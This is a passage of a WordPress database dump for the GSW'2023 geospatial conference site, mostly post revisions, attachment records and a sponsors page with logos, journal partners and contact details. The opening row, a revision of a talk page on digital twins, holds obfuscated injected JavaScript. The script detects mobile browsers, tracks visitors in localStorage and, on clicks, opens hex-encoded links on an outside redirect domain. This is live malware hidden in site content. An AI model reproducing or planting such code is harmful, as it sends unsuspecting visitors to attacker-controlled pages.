_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Mohamed Elhabiby, The Future of Digital Twins and Reality Modelling Technologies in the Energy and Construction Sectors','','inherit','closed','closed','','4582-autosave-v1','','','2023-08-18 19:26:33','2023-08-18 19:26:33','',4582,'https://gsw2023.com/?p=5336',0,'revision','',0),
(5337,1,'2023-08-18 19:11:07','2023-08-18 19:11:07','','Intelligent remote sensing satellite based on Internet一LuoJia03-1 Satellite-0331','','inherit','open','closed','','intelligent-remote-sensing-satellite-based-on-internet%e4%b8%80luojia03-1-satellite-0331','','','2023-08-18 19:11:07','2023-08-18 19:11:07','',4578,'https://gsw2023.com/wp-content/uploads/2023/05/Intelligent-remote-sensing-satellite-based-on-Internet一LuoJia03-1-Satellite-0331.pdf',0,'attachment','application/pdf',0),
(5338,1,'2023-08-18 19:29:26','2023-08-18 19:29:26','','Intelligent remote sensing satellite based on Internet一LuoJia03-1 Satellite-0331','','inherit','open','closed','','intelligent-remote-sensing-satellite-based-on-internet%e4%b8%80luojia03-1-satellite-0331-2','','','2023-08-18 19:29:26','2023-08-18 19:29:26','',4578,'https://gsw2023.com/wp-content/uploads/2023/05/Intelligent-remote-sensing-satellite-based-on-Internet一LuoJia03-1-Satellite-0331-1.pdf',0,'attachment','application/pdf',0),
(5339,1,'2023-08-19 21:43:04','2023-08-19 21:43:04','','V ABE Logo','','inherit','open','closed','','v-abe-logo','','','2023-08-19 21:43:04','2023-08-19 21:43:04','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg',0,'attachment','image/jpeg',0),
(5340,1,'2023-08-19 21:43:05','2023-08-19 21:43:05','','V ABE Logo','','inherit','open','closed','','v-abe-logo-2','','','2023-08-19 21:43:05','2023-08-19 21:43:05','',3066,'https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5-1.jpg',0,'attachment','image/jpeg',0),
(5341,1,'2023-08-19 21:44:07','2023-08-19 21:44:07','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]\r\n<h3 style=\"text-align: center;\"></h3>\r\n&nbsp;\r\n\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner]</p>\r\n[vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]\r\n\r\n&nbsp;\r\n\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\">\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner]</p>\r\n<p style=\"text-align: center;\">[vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px 